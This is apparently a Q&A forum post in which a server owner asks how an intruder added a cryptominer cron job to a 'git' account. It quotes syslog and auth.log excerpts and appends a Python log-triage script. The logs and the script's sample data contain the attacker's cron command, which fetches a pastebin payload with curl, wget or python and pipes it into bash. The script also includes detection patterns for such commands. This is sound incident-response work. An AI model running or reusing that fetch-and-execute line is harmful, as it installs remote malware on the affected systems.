It seems someone gained access to my Ubuntu server and installed a cryptominer. This user added a crontab for the user "git" on my server. I disconnected the server from the internet and I am trying to find out how this person gained access to this git user. However, I have not found any successful sshd connections. I did find a lot of failed password attempts.

In the syslog I have found the following:

Jul 15 10:57:25 servername crontab[2816584]: (git) LIST (git)
Jul 15 10:57:25 servername crontab[2816588]: (git) REPLACE (git)
Jul 15 11:09:01 servername CRON[3005313]: (git) CMD ((curl -fsSL https://pastebin.com/raw/LYdmF72J||wget -q -O- https://pastebin.com/raw/LYdmF72J||python -c 'import urllib2 as fb1;print fb1.urlopen("https://pastebin.com/raw/LYdmF72J").read()')| bash -sh)

In the auth.log I find a lot of failed password attempts with different users, including the "git" user. One example of this for a non-existent user "testuser":

Jul 9 04:57:07 servername sshd[2056938]: Failed password for invalid user testuser from 2.57.122.150 port 33308 ssh2
Jul 9 04:57:10 servername sshd[2056938]: Connection closed by invalid user testuser 2.57.122.150 port 33308 [preauth]

A lot of failed password attempts, but none seem successful. Can someone help me investigate this?

Thanks in advance.

Davidoffo
  • @HBruijn thanks, I will look into it. – Davidoffo Aug 18 '23 at 12:22
    In general most compromises are the result of a successful exploit of an already (well-) known vulnerability from a piece of software that wasn't patched on your server. – HBruijn Aug 18 '23 at 12:29

0 Answers
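The log triage the question asks for, as an added Python example that is not part of the original post or any answer: it parses syslog and auth.log lines, flags crontab REPLACE/DELETE events and cron commands that pipe a download into a shell, and lists accepted SSH logins next to per-IP and per-user failure counts so that one real login is not lost in brute-force noise. The sample lines are constructed for the example and modelled on the excerpts above; the "Accepted publickey" line, the address 203.0.113.7 and the fingerprint placeholder are invented so that the login detector has something to find.

```python
"""Triage helpers for syslog (cron) and auth.log (sshd) lines."""
import re
from collections import Counter

# Constructed sample log lines modelled on the excerpts in the question; they are
# not copied from any real host. The "Accepted publickey" line, the address
# 203.0.113.7 and the fingerprint placeholder are invented for the example.
SYSLOG = """\
Jul 15 10:57:25 servername crontab[2816584]: (git) LIST (git)
Jul 15 10:57:25 servername crontab[2816588]: (git) REPLACE (git)
Jul 15 11:09:01 servername CRON[3005313]: (git) CMD ((curl -fsSL https://pastebin.com/raw/LYdmF72J||wget -q -O- https://pastebin.com/raw/LYdmF72J)|bash -sh)
Jul 15 11:17:01 servername CRON[3005400]: (root) CMD (cd / && run-parts --report /etc/cron.hourly)
"""

AUTHLOG = """\
Jul 9 04:57:07 servername sshd[2056938]: Failed password for invalid user testuser from 2.57.122.150 port 33308 ssh2
Jul 9 04:57:10 servername sshd[2056938]: Connection closed by invalid user testuser 2.57.122.150 port 33308 [preauth]
Jul 9 04:58:02 servername sshd[2056950]: Failed password for git from 2.57.122.150 port 33410 ssh2
Jul 9 04:58:09 servername sshd[2056950]: Failed password for git from 2.57.122.150 port 33410 ssh2
Jul 10 21:13:44 servername sshd[2101002]: Accepted publickey for git from 203.0.113.7 port 51022 ssh2: RSA SHA256:placeholder
Jul 10 21:13:44 servername sshd[2101002]: pam_unix(sshd:session): session opened for user git by (uid=0)
"""

# crontab(1) audit lines: "(actor) REPLACE (target)" means actor rewrote target's crontab
CRON_EDIT = re.compile(r"crontab\[\d+\]: \((?P<actor>[^)]+)\) (?P<action>REPLACE|DELETE) \((?P<target>[^)]+)\)")
# cron(8) execution lines: "(user) CMD (command)"
CRON_CMD = re.compile(r"CRON\[\d+\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)$")
# download-and-execute: a fetcher somewhere before a pipe into sh/bash
FETCH_EXEC = re.compile(r"\b(curl|wget|python\S*)\b.*\|\s*(ba)?sh\b")
PASTE_SITE = re.compile(r"pastebin\.com|hastebin|ghostbin|paste\.ee", re.I)

SSH_FAIL = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port")
SSH_OK = re.compile(r"sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>\S+) port")


def cron_changes(lines):
    """Return (actor, action, target) for every crontab rewrite or deletion."""
    out = []
    for line in lines:
        m = CRON_EDIT.search(line)
        if m:
            out.append((m["actor"], m["action"], m["target"]))
    return out


def suspicious_cron_cmds(lines):
    """Return cron jobs that fetch remote content and pipe it into a shell,
    or that reference a paste site, with the reasons they were flagged."""
    hits = []
    for line in lines:
        m = CRON_CMD.search(line)
        if not m:
            continue
        reasons = []
        if FETCH_EXEC.search(m["cmd"]):
            reasons.append("fetch piped into shell")
        if PASTE_SITE.search(m["cmd"]):
            reasons.append("paste site URL")
        if reasons:
            hits.append({"user": m["user"], "cmd": m["cmd"], "reasons": reasons})
    return hits


def ssh_summary(lines):
    """Accepted logins plus failure counts per source IP and per user name."""
    accepted, failed_by_ip, failed_users = [], Counter(), Counter()
    for line in lines:
        ok = SSH_OK.search(line)
        if ok:
            accepted.append((ok["user"], ok["ip"], ok["method"]))
            continue
        bad = SSH_FAIL.search(line)
        if bad:
            failed_by_ip[bad["ip"]] += 1
            failed_users[bad["user"]] += 1
    return {"accepted": accepted, "failed_by_ip": failed_by_ip, "failed_users": failed_users}


if __name__ == "__main__":
    # Run against the constructed samples; point these at the real files on a copy
    # of the disk (e.g. open("/var/log/auth.log").read().splitlines()) when triaging.
    for actor, action, target in cron_changes(SYSLOG.splitlines()):
        print(f"crontab {action} of {target} by {actor}")
    for hit in suspicious_cron_cmds(SYSLOG.splitlines()):
        print(f"suspicious cron job for {hit['user']}: {', '.join(hit['reasons'])}\n  {hit['cmd']}")
    s = ssh_summary(AUTHLOG.splitlines())
    print("accepted logins:", s["accepted"])
    print("failures by IP:", s["failed_by_ip"].most_common(5))
    print("failures by user:", s["failed_users"].most_common(5))
```

The REPLACE event is the timestamp to pivot on: whatever process wrote the crontab ran as the git user at 10:57:25, so a session opened just before that in auth.log, wtmp/btmp (`last -f`), or the git service's own logs (if the user exists for a hosted Git service) is the next place to look. Note that sshd logs key-based logins as "Accepted publickey", not "Accepted password", so grepping only for password failures misses them.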